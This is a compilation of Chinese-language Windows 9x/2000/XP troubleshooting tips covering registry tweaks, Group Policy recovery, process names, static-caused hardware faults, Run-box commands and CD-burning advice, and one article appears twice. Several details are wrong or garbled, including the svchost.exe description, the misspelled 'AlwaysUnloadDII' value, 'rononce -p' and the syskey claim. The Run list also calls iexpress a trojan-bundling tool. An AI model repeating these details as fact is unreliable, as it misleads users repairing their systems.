    不少的内存优化软件，如RAM Idle和Memo Kit都能够自动清空“剪贴板”、释放被关闭程序未释放的系统资源、对虚拟内存文件(Win386.swp)进行重新组织等，免除手工操作的麻烦，达到自动释放系统资源的目的。

第二种思路：
    1.禁用一部分启动项
    启动时加载过多的应用程序会使Windows因系统资源严重不足而“蓝屏”，因此我们最好运行“Msconfig”禁用一部分应用程序。或者使用Windows优化大师来代劳。

    2.设置足够的虚拟内存
    虚拟内存不足也会造成系统多任务运算错误，我们可以通过时常删除一些临时文件和交换文件对此问题加以解决，此外还可以在“系统属性”下手动配置虚拟内存，把虚拟内存的默认位置转到其他逻辑盘下。并设置得大一些。

    3.给硬盘保留足够空间
    由于Win9X运行时需要用硬盘作虚拟内存，这就要求硬盘必须保留一定的自由空间以保证程序的正常运行。一般而言，最低应保证100MB以上的空间，否则出现“蓝屏”很可能与硬盘剩余空间太小有关。另外，硬盘的碎片太多，也容易导致“蓝屏”的出现。因此，每隔一段时间进行一次碎片整理是必要的。

    4.使用内存管理软件
    剩下的就是些杂项了，诸如不用activedesktop之类浪费资源的功能。使用内存管理软件，如RAM Idle之类的。养成好习惯，暂时不用的程序就将其关闭。


解决系统资源严重不足

《一键清理系统垃圾》

解决系统资源严重不足

关于概念：
系统资源（System Resource）和内在并不是同一个概念。
微软将Windows的系统资源（堆）分为五个堆，其中User资源堆为三个，而GDI资源堆为两个。
    三个User资源堆分别是：16位的用户堆（User Heap，64KB）；32位的窗口堆（Windows Heap，2MB）；32位的用户菜单堆（User Menu Heap，2MB）。
    两个GDI资源堆分别是：16位的GDI堆（GDI Heap，64KB）；32位的GDI堆（GDI，2MB）。
    从这里的系统资源分类和大小我们应该明白，不管CPU是P4还是486，内存是8M还是1G，所有Windows的用户都拥有同样大小的系统资源（堆），用户不能自己增加或减少系统资源的大小，这是由操作系统决定的，与硬件档次没有任何关系。

问题原因：
在Windows中每运行一个程序，系统资源就会减少。有的程序会消耗大量的系统资源，即使把资源关闭，在内存中还是有一些没有的ＤＬＬ文件在运行，这样就便得系统的运行速度下降，甚至出现上述问题。

解决办法：
我们可以通过修改注册表键值的方法，使关闭软件后自动清除内存中没用的ＤＬＬ文件及时收回消耗的系统资源。打开注册表编辑器，找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer"为主键，在右过窗中单击右键，新建一个名这“AlwaysUnloadDII“的“字符串值“，然后将“AlwaysUnloadDII“的键值修改为“1“，退出注册表重新启动机器即可达到目的。


解决限制使用应用程序问题

《一键清理系统垃圾》

解决限制使用应用程序问题

    开机按F8进入安全模式选项，用带命令行提示的安全模式，在提示符后直接输入“mmc”(Microsoft管理控制台)，操作步骤记录如下：

首先在“文件”菜单下打开“添加/删除管理单元”(或直接用快捷键“Ctrl+M”)，在出现的对话框中单击“添加”按钮，系统就会列出一大串可添加的管理单元，选定“组策略”，再单击“添加”，会出现“欢迎使用组策略向导”窗口，点“下一步”，最后单击“完成”。关闭可添加的管理单元的列表，然后在“添加/删除管理单元”对话框里点“确定”，你会发现在“控制台根节点”窗口的左侧“控制台根节点”项目下多了一个“本地计算机”，将它展开，下面的操作就跟你启用“限制使用应用程序”时一样了。只要把“只运行许可的Windows应用程序”里的“启用”改为“未配置”就行了。最后关闭“Microsoft管理控制台”，此时会跳出一个对话框，提示保存，点“确定”，若提示无法保存，不要理它，单击“否”，关闭即可。

回到DOS命令窗口，按“Ctrl+Alt+Del”组合键，选择“关机”选项下的“重新启动”。回到正常状态下，所有的应用程序又都可以使用了。


音量为何会自动调节

《一键清理系统垃圾》

音量为何会自动调节

    问：我用Winamp听MP3时，每听完一首歌之后，音量调节(即双击小喇叭图标)的第二个控制钮“WAVE”便从刚调节的音量处降到最下面，但在玩游戏、看VCD时没出现过此种情况，这是什么原因造成的，该如何解决？

    答：运行Winmap，打开“选项→参数设置→插件→输出”菜单，选择“WaveOut输出...”插件，点击“配置”按钮，在弹出的对话框中取消“停止时复位到原始值”(去掉前面的小钩)，按“确定”按钮即可。


应用程序不能启动

《一键清理系统垃圾》

应用程序不能启动

    湖北读者何国明来信：我的电脑上安装的是Win2000操作系统。我以系统管理员(Administrator)的身份进入系统，然后在组策略(gpedit.msc)“用户配置→管理模板→系统”里，不小心把“只运行许可的Windows应用程序”启用了，我只加了IE进去，所以现在就只能运行IE了。运行其他的程序时都说是没有权限，无法运行！我该怎么办呢？

    A：在Win2000开始启动的时候按下F8键，选择“带命令行提示的安全模式”，然后登录。在命令行模式中输入mmc.exe，打开控制台，然后从文件中选择“添加/删除管理单元”，按添加按钮，把组策略添加到控制台中。然后选择“用户配置→管理工具→系统”，双击只运行许可的Windows应用程序，设置为“已禁用”，确定以后从文件菜单上选择“保存”，然后选择退出，最后按下“Ctrl+Alt+Del”调出“Windows安全”窗口，选择重新启动即可。


加快右键菜单的响应速度

《一键清理系统垃圾》

加快右键菜单的响应速度

    问：前段时间我在操作电脑的过程中发现，如果单击鼠标右键，移到右键菜单的“新建”时，响应速度非常慢。而且在桌面空白处单击鼠标右键时，右键菜单的响应速度也非常慢，请问这是什么原因？

    答：很多软件安装后，都会在右键菜单中添加一些项目，如果项目太多，特别是“新建”里面的内容比较多的时候，就比较容易出现这个问题。解决办法是加快显示速度：修改注册表里面HKEY_CURRENT_USER\Control Panel\desktop的字符串MenuShowDelay的值为200或更小的数值；或使用像TweakUI那样的工具删除“新建”里面不需要的项目。


解决右键发送到问题

《一键清理系统垃圾》

解决右键发送到问题

在“C:＼WINDOWS＼SendTo”（2000及XP为C:\Documents and Settings\用户名\SendTo）目录下，空白处右击，点选“新建/文本文档”，其后在SendTo窗口中显然会有一个0字节的记事本图标文本文件“新建文本文档.txt”:
1、邮件接收者
将这个“新建文本文档.txt”重命名为“邮件接收者.MAPIMail”！此后会出现“如果改变文件扩展名，可能会导致文件不可用。确实要更改吗？”这样一个重命名警告对话框，按“是”。
2、桌面快捷方式
将这个“新建文本文档.txt”重命名为“桌面快捷方式.DESKLINK”！此后会出现“如果改变文件扩展名，可能会导致文件不可用。确实要更改吗？”这样一个重命名警告对话框，按“是”。
3、A盘
在这里建一个A盘的快捷方式，指向A盘就可以了。

提示：前提是你必须从“文件夹选项”的“查看”选项卡下将“隐藏已知文件类型的扩展名”前的“√”去掉(即要显示出已知文件类型的扩展名)！否则“新建文本文档.txt”就成了“邮件接收者.MAPIMail.txt”，而不是“邮件接收者.MAPIMail”！！


解决桌面图标乱的方法

《一键清理系统垃圾》

解决桌面图标乱的方法

这是由于Windows的图标缓冲文件被破坏了，请启动“资源管理器”程序，然后进入Windows文件夹，找到一个名为ShellIconCache的文件，并将它删除。再重新启动Windows，Windows就会重建图标缓冲文件，桌面上的图标就会恢复原状。


进程名解释

《一键清理系统垃圾》

进程名解释

smss.exe　　sessionmanager
csrss.exe　　子系统服务器进程
winlogon.exe　　管理用户登录
services.exe　　包含很多系统服务
lsass.exe　　管理 ip 安全策略以及启动 isakmp/oakley (ike) 和 ip 安全驱动程序。
svchost.exe　　windows 2000/xp 的文件保护系统
spoolsv.exe　　将文件加载到内存中以便迟后打印。)
explorer.exe　　资源管理器
internat.exe　　托盘区的拼音图标)
mstask.exe　　允许程序在指定时间运行。
regsvc.exe　　允许远程注册表操作。(系统服务)－>remoteregister
winmgmt.exe　　 提供系统管理信息(系统服务)。
inetinfo.exe　　msftpsvc,w3svc,iisadmn
tlntsvr.exe　　tlnrsvr
tftpd.exe　　实现 tftp internet 标准。该标准不要求用户名和密码。
termsrv.exe　　termservice
dns.exe　　　　应答对域名系统(dns)名称的查询和更新请求
tcpsvcs.exe　　提供在 pxe 可远程启动客户计算机上远程安装 windows 2000 professional 的能力
ismserv.exe　　允许在 windows advanced server 站点间发送和接收消息
ups.exe　　　　管理连接到计算机的不间断电源(ups
wins.exe　　为注册和解析 netbios 型名称的 tcp/ip 客户提供 netbios 名称服务
llssrv.exe　　证书记录服务
ntfrs.exe　　在多个服务器间维护文件目录内容的文件同步
rssub.exe　　控制用来远程储存数据的媒体
locator.exe　　管理 rpc 名称服务数据库
lserver.exe　　注册客户端许可证
dfssvc.exe　　管理分布于局域网或广域网的逻辑卷
clipsrv.exe　　支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面
msdtc.exe　　并列事务，是分布于两个以上的数据库，消息队列，文件系统或其它事务保护护资源管理器
faxsvc.exe　　帮助您发送和接收传真
cisvc.exe　　索引服务
dmadmin.exe　　磁盘管理请求的系统管理服务
mnmsrvc.exe　　允许有权限的用户使用 netmeeting 远程访问 windows 桌面
netdde.exe　　提供动态数据交换 (dde) 的网络传输和安全特性
smlogsvc.exe　　配置性能日志和警报
rsvp.exe　　为依赖质量服务(qos)的程序和控制应用程序提供网络信号和本地通信控制安装功功能
rseng.exe　　协调用来储存不常用数据的服务和管理工具
rsfsa.exe　　管理远程储存的文件的操作
grovel.exe　　扫描零备份存储(sis)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间（只对 ntfs 文件系统有用）
scardsvr.exe　　对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制
snmp.exe　　包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报
snmptrap.exe　　接收由本地或远程 snmp 代理程序产生的陷阱（trap）消息，然后将消息传递到运行在这台计算机上 snmp 管理程序
utilman.exe　　从一个窗口中启动和配置辅助工具
msiexec.exe　　依据 .msi 文件中包含的命令来安装、修复以及删除软件


进入休眠状态以后不能唤醒故障一例

《一键清理系统垃圾》

进入休眠状态以后不能唤醒故障一例

    计算机进入休眠状态以后不能唤醒这种故障经常困扰着用户，这种现象就是计算机可以顺利地进入休眠状态，但是敲击键盘和PS/2鼠标不能够把计算机唤醒，而不得强行重新启动，而造成了许多的麻烦。

    本人的计算机也曾经出现过这种故障，情况是这样的：最初时使用串口鼠标，刚安装完Ｗｉｎｄｏｗｓ98的时候休眠功能一切正常，进入休眠状态以后可以使用键盘或者鼠标把计算机唤醒。可是过了一些日子之后就发现进入休眠状态以后只能用鼠标可以把计算机唤醒，而敲击键盘计算机却没有任何反应。因为使用鼠标还可以将计算机唤醒所以当时也就没有太在意。

    后来由于为了上网方便所以换了一个PS/2接口的滚轮鼠标。可是发现此时如果让计算机进入休眠状态以后却无法唤醒了，此时无论如何敲击键盘和点击鼠标机器均无反映，只有按下RESET键强行启动。

    起初以为是某种软件与系统冲突，于是犹如过筛一样的反复安装软件，但结果仍是不确定，而且要想恢复休眠功能只有格式化硬盘重新安装系统才能恢复，可这样用不了多久就莫名其妙的旧病复发，后来安装WINDOWS Me仍然如此。后来认为是BIOS设置不当引起，于是反复试验仍然没有结果，后来分析应不是BIOS设置问题，因为如果是设置问题的话应该在安装完系统以后就不正常，而不应后来才出现故障。当然安装主板芯片组最新补丁同样也不奏效。

    奇怪的是故障发生以后只有插上串口鼠标才可以唤醒机器，这也就解释了为什么原来对此故障不太在意的原因了，因为我原来使用的是串口鼠标。

    后来经过无数次的摸索终于找到了答案，结果令自己难以置信，故障的罪魁祸首竟然是WINDOWS自己所带的“维护向导”，只要双击“维护向导”，哪怕你不运行其中的任何任务，休眠功能也会立刻瘫痪，而且难以修复，只能重新安装系统！好在“维护向导”只是一个辅助工具，其功能全部可以手动完成，于是重装系统，将他置入回收站，机器又可以安全的使用休眠功能了。

    当然“维护向导”并不是会在每一台机器休眠后造成唤醒失败，而是在VIA芯片组的机器上发生的几率多一些，如果你的机器也有类似故障可以试一下。


警惕电脑杀手——灰尘

《一键清理系统垃圾》

警惕电脑杀手——灰尘

    清晨，睡梦中的我被一阵急促的电话铃声惊醒。电话的另一端传来了好友急切的求救声：“机器前几天还是好好的，今天早上一开机，屏幕一闪就黑掉了，PC喇叭不停地响。按RESET键重启后，除了隐约听到CPU风扇的风声外，机器就没有任何反应了。”
    听完病状，我想计算机黑屏加上PC喇叭不停地响一般都是内存和显卡的毛病，主要是接触不良，一般拔下并重插或换个插槽就可解决。于是二话不说，取下机箱盖。一看，好家伙，机器内部各板卡上布满了厚厚的灰尘！好友的爱机已购置近两年，在此期间，由于使用正常，又加上不具备DIY精神，所以至今都不曾打开过。不用说，一定是灰尘导致某配件接触不良。于是我给爱机来了一个大扫除。我将所有配件全部从机箱内取出，拿着小毛刷一件一件地清扫，当清扫到内存条的时候，发现它的焊点面上的尘土非常之厚，而且用小毛刷根本就清除不掉。仔细观察才发现，由于该机主板设计不合理，内存条紧挨着CPU，当CPU风扇工作时，尘土全部吹到了内存条上，而且越积越厚，越厚越硬。没办法，只好用酒精棉一点点地擦，当使它露出庐山真面目的时候才发现它的线路板上有烧焦的痕迹——内存条烧坏了。当把所有配件，包括电源清扫干净后，地上的尘土足有几两重。将各配件插好，更换新的内存条后，故障排除。
    要知道，灰尘和静电都是电子设备的大敌，板卡上灰尘过厚不利于元器件散热，天气潮湿时还容易引起电路局部短路。本人提醒广大计算机爱好者一定要定期清扫你的爱机


静电造成的故障三例

《一键清理系统垃圾》

静电造成的故障三例

编者按：时值冬季，北方天气干燥，容易产生静电，特刊发此篇文章，希望引起大家的注意。

故障现象一：一台机器，CPU为C466，主板为华硕P2B，内存为64MB，开机运行一段时间后，机箱内出现打火声，屏幕上出现许多杂乱字符，并随机出现奇偶校验错误，提示“PARITY CHECK1或PARITY CHECK2”，最后死机。

故障分析：由于上述现象是随机出现的，性质和位置均不固定。工作一段时间后有打火声，可见机器硬件并无关键性故障。联想到近期有时操作键盘还伴有电麻感觉，因此怀疑是由于机壳表面的静电高压与机内低电位放电所造成的。产生这种现象的放电原因一般是地线接触不良或显示器高压漏电。更换一台新的显示器后，故障依旧。于是怀疑只有地线接地不良的原因了。到室外刨出埋在地下的地线接地装置，发现地线已经被腐蚀断，重新连接后，故障排除。

经验总结一：这种现象往往是静电过高造成的，其中尤以系统接地不良的情况多见。静电放电会使显示器工作异常、打印机打印出的字符混乱，严重时导致驱动器读写错误，甚至电源开路时也能烧毁集成电路芯片以及整块电路板。当人体感受到静电作用时，其电压已经有2500V左右，这足以导致机器产生故障。

故障现象二：一个ISDN网吧，主服务器CPU为PⅢ600E、主板为技嘉BX2000+，内存为128MB，安装了一个内置ISDN TA，其它用户机器分别是K6-2 350兼容机。安装成功后，主服务器上网连接速度很低，用户机器根本不能拨号上网。

故障分析：经检查通信线路、硬件设备和软件设置都没有问题。后上网查询资料得知，机器中有静电存在或接地不良容易影响内置式ISDN TA的上网速度，最明显的表现就是连接速度太低或经常连接不上。根据这一线索，笔者重点检查了整个网吧供电线路的连接情况，最后发现主服务器的供电输入端接地不良，重新对整个供电系统接地后，系统工作正常。

故障现象三：一台机器，CPU为赛扬466，主板为华硕P2B，内存为64MB，全向HSF56K内置Modem，安装好硬件和Modem驱动程序后，拨号上网时发现连接速度为28800bps，浏览速度很慢。

故障分析：首先怀疑是电话线路质量不佳，检查后发现无问题。接着又把该Modem安装在别人的一台CPU为C300A，主板为捷波7BXAN，内存为64MB的机器上试用时，发现连接速度稳定在48000bps，排除了Modem本身的问题，而且与硬件配置也没有关系，这是什么原因呢？联想到最近在网吧安装机器时遇到的情况，怀疑是机器接地不良造成的，赶快打开机箱检查，结果一摸机箱就被电了一下，可见有很强的静电。关机后，从机箱后接一根地线到金属暖气管上，把静电引走。重新开机，连接速度为52000bps，基本上属于正常的速度。

经验总结二：一说到对上网连接速度的影响，很多人都想到机器的硬件配置、Modem的本身品质和速度以及电话线路的质量好坏，但是如果机器接地不良，容易产生静电，也会造成上网连接速度很低，或者根本不能拨号上网。总之，当你不能拨号上网，或者上网连接速度太低时，不妨抽空检查一下机器接地是否良好。

上面介绍的三个例子是只是静电造成故障的几个方面，其它类似的故障还有很多种，如带电插拔板卡或设备，造成硬件接口损坏；用手触摸主板上线路时，对主板上的集成电路芯片造成损坏等等。既然静电的危害作用如此明显，我们怎样才能消除静电呢？消除静电的方法有很多，其中以下两个方面最重要。

一是正确地连接地线，保证接地良好。如果连接地线接触不良，有些比较敏感的人只要触摸机器的金属部分就有触电的感觉，虽然只有110V，但集成电路芯片所能承受的电压远小于110V。所以，如果计算机系统，包括主机、打印机、显示器等不接地，则可能造成主板、打印口、显示卡损坏。正确接地的方法是，将一块焊有导线的金属板，深埋在建筑物旁的泥土中，金属板周围有防锈剂和吸湿剂以保证良好接地，金属板上导线引入屋内并通过三眼插座与计算机设备的外壳相连。这样可以有效地将计算机设备外壳上的静电、漏电良好地引入大地，有效地释放漏电。

二是操作过程中静电的处理。作为计算机操作人员，要时刻牢记静电放电的危害作用。在操作计算机前先用手接触一下地线或暖气管等，要穿着不易产生静电的工作服和鞋子。平时不要随便触摸计算机内部板卡，如果一定要接触内部线路，要戴防静电护腕。维修时使用电烙铁也需要接地，而且必须在断电后工作。


静电造成的故障三例

《一键清理系统垃圾》

静电造成的故障三例

        故障现象一：一台机器，CPU为C466，主板为华硕P2B，内存为64MB，开机运行一段时间后，机箱内出现打火声，屏幕上出现许多杂乱字符，并随机出现奇偶校验错误，提示“PARITY CHECK1或PARITY CHECK2”，最后死机。
        故障分析：由于上述现象是随机出现的，性质和位置均不固定。工作一段时间后有打火声，可见机器硬件并无关键性故障。联想到近期有时操作键盘还伴有电麻感觉，因此怀疑是由于机壳表面的静电高压与机内低电位放电所造成的。产生这种现象的放电原因一般是地线接触不良或显示器高压漏电。更换一台新的显示器后，故障依旧。于是怀疑只有地线接地不良的原因了。到室外刨出埋在地下的地线接地装置，发现地线已经被腐蚀断，重新连接后，故障排除。
        经验总结一：这种现象往往是静电过高造成的，其中尤以系统接地不良的情况多见。静电放电会使显示器工作异常、打印机打印出的字符混乱，严重时导致驱动器读写错误，甚至电源开路时也能烧毁集成电路芯片以及整块电路板。当人体感受到静电作用时，其电压已经有2500V左右，这足以导致机器产生故障。
        故障现象二：一个ISDN网吧，主服务器CPU为PⅢ600E、主板为技嘉BX2000+，内存为128MB，安装了一个内置ISDN TA，其它用户机器分别是K6-2 350兼容机。安装成功后，主服务器上网连接速度很低，用户机器根本不能拨号上网。
        故障分析：经检查通信线路、硬件设备和软件设置都没有问题。后上网查询资料得知，机器中有静电存在或接地不良容易影响内置式ISDN TA的上网速度，最明显的表现就是连接速度太低或经常连接不上。根据这一线索，笔者重点检查了整个网吧供电线路的连接情况，最后发现主服务器的供电输入端接地不良，重新对整个供电系统接地后，系统工作正常。
        故障现象三：一台机器，CPU为赛扬466，主板为华硕P2B，内存为64MB，全向HSF56K内置Modem，安装好硬件和Modem驱动程序后，拨号上网时发现连接速度为28800bps，浏览速度很慢。
        故障分析：首先怀疑是电话线路质量不佳，检查后发现无问题。接着又把该Modem安装在别人的一台CPU为C300A，主板为捷波7BXAN，内存为64MB的机器上试用时，发现连接速度稳定在48000bps，排除了Modem本身的问题，而且与硬件配置也没有关系，这是什么原因呢？联想到最近在网吧安装机器时遇到的情况，怀疑是机器接地不良造成的，赶快打开机箱检查，结果一摸机箱就被电了一下，可见有很强的静电。关机后，从机箱后接一根地线到金属暖气管上，把静电引走。重新开机，连接速度为52000bps，基本上属于正常的速度。
        经验总结二：一说到对上网连接速度的影响，很多人都想到机器的硬件配置、Modem的本身品质和速度以及电话线路的质量好坏，但是如果机器接地不良，容易产生静电，也会造成上网连接速度很低，或者根本不能拨号上网。总之，当你不能拨号上网，或者上网连接速度太低时，不妨抽空检查一下机器接地是否良好。
        上面介绍的三个例子是只是静电造成故障的几个方面，其它类似的故障还有很多种，如带电插拔板卡或设备，造成硬件接口损坏；用手触摸主板上线路时，对主板上的集成电路芯片造成损坏等等。既然静电的危害作用如此明显，我们怎样才能消除静电呢？消除静电的方法有很多，其中以下两个方面最重要。
        一是正确地连接地线，保证接地良好。如果连接地线接触不良，有些比较敏感的人只要触摸机器的金属部分就有触电的感觉，虽然只有110V，但集成电路芯片所能承受的电压远小于110V。所以，如果计算机系统，包括主机、打印机、显示器等不接地，则可能造成主板、打印口、显示卡损坏。正确接地的方法是，将一块焊有导线的金属板，深埋在建筑物旁的泥土中，金属板周围有防锈剂和吸湿剂以保证良好接地，金属板上导线引入屋内并通过三眼插座与计算机设备的外壳相连。这样可以有效地将计算机设备外壳上的静电、漏电良好地引入大地，有效地释放漏电。
        二是操作过程中静电的处理。作为计算机操作人员，要时刻牢记静电放电的危害作用。在操作计算机前先用手接触一下地线或暖气管等，要穿着不易产生静电的工作服和鞋子。平时不要随便触摸计算机内部板卡，如果一定要接触内部线路，要戴防静电护腕。维修时使用电烙铁也需要接地，而且必须在断电后工作。


开始→运行→输入的命令集锦

《一键清理系统垃圾》

开始→运行→输入的命令集锦

  winver---------检查Windows版本

    wmimgmt.msc----打开windows管理体系结构(WMI)

    wupdmgr--------windows更新程序

    wscript--------windows脚本宿主设置

    write----------写字板

    winmsd---------系统信息

    wiaacmgr-------扫描仪和照相机向导

    winchat--------XP自带局域网聊天

    mem.exe--------显示内存使用情况

    Msconfig.exe---系统配置实用程序

    mplayer2-------简易widnows media player

    mspaint--------画图板

    mstsc----------远程桌面连接

    mplayer2-------媒体播放机

    magnify--------放大镜实用程序

    mmc------------打开控制台

    mobsync--------同步命令

    dxdiag---------检查DirectX信息

    drwtsn32------ 系统医生

    devmgmt.msc--- 设备管理器

    dfrg.msc-------磁盘碎片整理程序

    diskmgmt.msc---磁盘管理实用程序

    dcomcnfg-------打开系统组件服务

    ddeshare-------打开DDE共享设置

    dvdplay--------DVD播放器

    net stop messenger-----停止信使服务

    net start messenger----开始信使服务

  notepad--------打开记事本

    nslookup-------网络管理的工具向导

    ntbackup-------系统备份和还原

    narrator-------屏幕“讲述人”

    ntmsmgr.msc----移动存储管理器

    ntmsoprq.msc---移动存储管理员操作请求

    netstat -an----(TC)命令检查接口

    syncapp--------创建一个公文包

    sysedit--------系统配置编辑器

    sigverif-------文件签名验证程序

    sndrec32-------录音机

    shrpubw--------创建共享文件夹

    secpol.msc-----本地安全策略

    syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

    services.msc---本地服务设置

    Sndvol32-------音量控制程序

    sfc.exe--------系统文件检查器

    sfc /scannow---windows文件保护

    tsshutdn-------60秒倒计时关机命令

    tourstart------xp简介（安装完成后出现的漫游xp程序）

    taskmgr--------任务管理器
  eventvwr-------事件查看器

    eudcedit-------造字程序

    explorer-------打开资源管理器

    packager-------对象包装程序

    perfmon.msc----计算机性能监测程序

    progman--------程序管理器

    regedit.exe----注册表

    rsop.msc-------组策略结果集

    regedt32-------注册表编辑器

    rononce -p ----15秒关机

    regsvr32 /u *.dll----停止dll文件运行

    regsvr32 /u zipfldr.dll------取消ZIP支持

    cmd.exe--------CMD命令提示符

    chkdsk.exe-----Chkdsk磁盘检查

    certmgr.msc----证书管理实用程序

    calc-----------启动计算器

    charmap--------启动字符映射表

    cliconfg-------SQL SERVER 客户端网络实用程序

    Clipbrd--------剪贴板查看器

    conf-----------启动netmeeting

    compmgmt.msc---计算机管理

    cleanmgr-------垃圾整理

    ciadv.msc------索引服务程序

    osk------------打开屏幕键盘

    odbcad32-------ODBC数据源管理器

    oobe/msoobe /a----检查XP是否激活

    lusrmgr.msc----本机用户和组

    logoff---------注销命令

    iexpress-------木马捆绑工具，系统自带

    Nslookup-------IP地址侦测器

    fsmgmt.msc-----共享文件夹管理器

    utilman--------辅助工具管理器

    gpedit.msc-----组策略


刻录秘技

《一键清理系统垃圾》

刻录秘技

想备分资料，却总是失败？刻坏的光盘，已经到了可以摆杯垫地摊的地步了？牢记这8个刻录秘技，远离刻坏盘的灰色岁月！

刻坏的光盘，一般我们都谑称为「飞盘」或是「杯垫」。运气好的人，刻坏片的纪录或许不多，运气差一点的，可能就这样五十、一百的把钱花在刻废片上。其实这不能完全归咎在「运气」上，刻录还是需要一点点技巧的。

或许你会提出质疑，难道刻录不是「数位」复制？既然是数位复制，又怎么会出现错误？对於这个问题，你只答对了一半，因为刻录光盘的资料内容是数位，刻录资料的方式却不是数位。就像计算机「计算功能」是数位的，可按下的手、接触的面积、键与电路板间的传递，却不是数位的，所以就算是数位化的计算机，如果接触不良，也有算不出来的时候。

因为刻录中这些「非数位」的因素，让刻录变得不是那么容易，你也可以说，是硬件设计还不够臻至完美的缘故吧。所以，如果能避免这些「非数位」因素，也就能间接提高刻片的成功率，以下就是我们列出让你不再刻坏片的8个方法：

慎选稳定可靠的机器

买刻录机或光驱，绝对不能光靠「看」的来决定，所以买之前要多做功课，留意网络众多好手的使用心得，稳定绝对比快速来的重要。

方法一：选一台稳定可靠的刻录机

买刻录机不同於买其他电脑周边，绝对不能光靠「看」的来决定，因为就算你有了刻录机，也有正版的刻录软件，再加上品质保证的刻录片，你还是有可能刻坏片。

又不能当场测试，那不是还是要用看的？其实用看也有门道。首先，买之前要多做功课，留意网路众多好手的使用心得，你会发现抢手的未必是超高速的机种，切记！刻成功比刻得快来得重要。

其次，买CD-RW刻录机比买CD-R刻录机要好，因为CD-RW刻录机可以使用CD-RW空片，而这种空片是可以被回收再利用的，所以刻坏也不怕，顶多「抹去」资料再重新刻一片，CD-R空片就没有办法这麽做。

买刻录机时要有产品保证书。很多人买东西都忘了这一个步骤，丧失自己退换货的权利，如果能得到厂商的维修、退换货服务等等保证，使用起来不是更安心？

方法二：避免使用会挑片的光驱

这里的光驱，是指电脑里原先安装的CD或DVD光驱，如果你想要从光驱对拷资料到刻录机里，就一定要一台稳定的光驱 。

光驱会不会挑片，使用过就知道了。有些光驱对水蓝色染料的光盘片「过敏」，有些则可能是绿片或水蓝片，这是因为光盘片染料无法有效反射，以致光驱内的雷射读取头发生讯号错乱。实际发生的原因很复杂，有可能是光盘片染料涂抹不均，也可能是光驱制造有瑕疵，总之这种光驱是不适合对拷的。

不过这恐怕要用了才知道，因此我们只能说，购买前先打听一下

刻录前的准备工作

关掉不必要的应用程式、先重整一下硬盘，这些小动作都可以让你的刻录更顺手，而且最重要的是，系统稳定永远比刻录软件来的更重要。

方法三：关闭不必要的应用程式

理由很简单，刻录已经很消耗资源、又有很多「非数位」因素再作祟，你又何必再添一桩？如果正准备刻录，建议你在开启刻录软件之「前」，就先关闭像是ICQ、Internet Explorer、Outlook、排程工作等等程式。硬件方面则取消自动安插、萤幕保护、省电装置等等，最好也别连线上网，别边刻边执行程式（我知道很多人喜欢边刻边听MP3，不知道你们杯垫已经有一打了吗？），就静静的让它在一旁刻吧！

方法四：系统稳定比刻录软件更重要

选择用Nero、EasyCD Creator还是CloneCD？其实这都还是後话，如果你的作业系统不稳定，常出现「蓝萤幕」或是「找不到所需要的xxx.dll程式，请重新启动」等等问题，那不论你安装什麽样的软件，都有很高的可能会刻坏片。

如果可能，刻录用的电脑上应该避免安装太过复杂的程式，像是安装监控软件、复杂的通讯软件、过多的防毒软件，原则上刻录前都应该关闭它们，降低常驻程式是一定要做的。有时候开机久了，电脑内暂存档案过多，也会是刻录工作的绊脚石，重新开机一次再开始刻录或许更好。

方法五：重整硬盘

刻录都需要暂存档，所以你要留空间放这些档案，这些档案在刻录完成後都会消失。建议你开机盘中至少留了1GB的空间，而资料盘中也预留1GB空间以上，多留一点硬盘空间是必须的。

定时检查硬盘磁区、重组硬盘磁区也是必要工作。因为刻录作业进行时，刻录资料如果暂存在硬盘中，完整的磁区会比分散磁区容易读写，重组硬盘正式为了让磁区变得更加完整。你不必担心这项作业的冗长，因为常重组磁区不但能加快硬盘资料的读取，还可以防止硬盘坏轨的产生，是一举三得的做法。

这些也不能不注意

CPU怕热，当然刻录机也不例外，刻录失败先检查一下是否开机过久？此外记得每隔三个月清理一下读取头。当然少用劣质的光盘片，也可以减少刻出飞盘的机率。

方法六：散热问题

刻录有多热，你拿刚刻出来的光盘片就知道。CPU高温会当机、记忆件过热会当机、显示卡也要加散热片，刻录机太热怎麽会不刻坏？

根本的解决方案是，不要将刻录机与硬盘上下靠着装，选用大型机箱（case），最好是三大两小或三小的那一种，每种设备间都空一格，留给散热之用。如果问题还是没解决，再从前方或後方加装个风扇试试看，选购一个外接式刻录机也是不错的办法。

如果刻出坏片了，千万不要接二连三的刻录，先检查一下是不是开机过久了？接连刻录太多了？每次刻录三四片後，建议你休息一下，再继续刻录，可以避免刻坏的可能性。

方法七：慎选刻录片

前面有提到，刻录失败很可能跟刻录片上的染料有关，所以选购好的刻录片，也是避免刻坏片的功课之一。并没有数据显示那一种染料的片子比较安全，也没有证明可以精确的说哪种片子保存最久，有印商标的正厂通常较受到好评，不过价钱也比较高。这里顺便提醒你，如果是重要的资料，切勿用10元一片的劣质空片来备分，这是相当危险的行为！

空片上有标示8X、10X等等字样，这些数字倍数，就表示这张空片可以支援的刻录速度，如果你的刻录机支援10倍速刻录，就可以选购印有10X的空片。通常只要选低於你刻录机速度的，或是你可以容忍的范围就可以了，用10倍速刻录机刻4倍空片虽然慢一点，但是或许更为品质稳定。

买回来的刻录片，别以为是有品牌就天下无敌，妥善的保存更为重要！光线、温度是光盘片的头号杀手，过度的照射、过高的温度都会让染料失效，让存满资料的光盘片化为空白。阴凉的位置（像是冷气房中的抽屉、阳光照不到的公事包内）是最好的保存地点，多数厂商都保证可以保存数十年不变！

短期需要用到的资料，你可以考虑用CD-RW片来刻录。藉助它可以随时抹写的优势，就不必花大钱买CD-R空片，而且CD-R空片刻坏了就不能再写入，CD-RW空片刻坏了却可以抹除重刻！选购CD-RW空片的技巧是一样的，通常有商标、品牌的都值得信赖。

方法八：清洁光驱和光碟

录影机看久了磁头会累积磁粉，影响收视画质，光学性的光驱（刻录机也是一样）用久了，读取头上也会堆积灰尘，造成读取失误的现象。你可以准备好清洁光盘，就是下方有一段毛刷的那一种，放进光驱中清洁，每隔三个月都应该清洁一次。

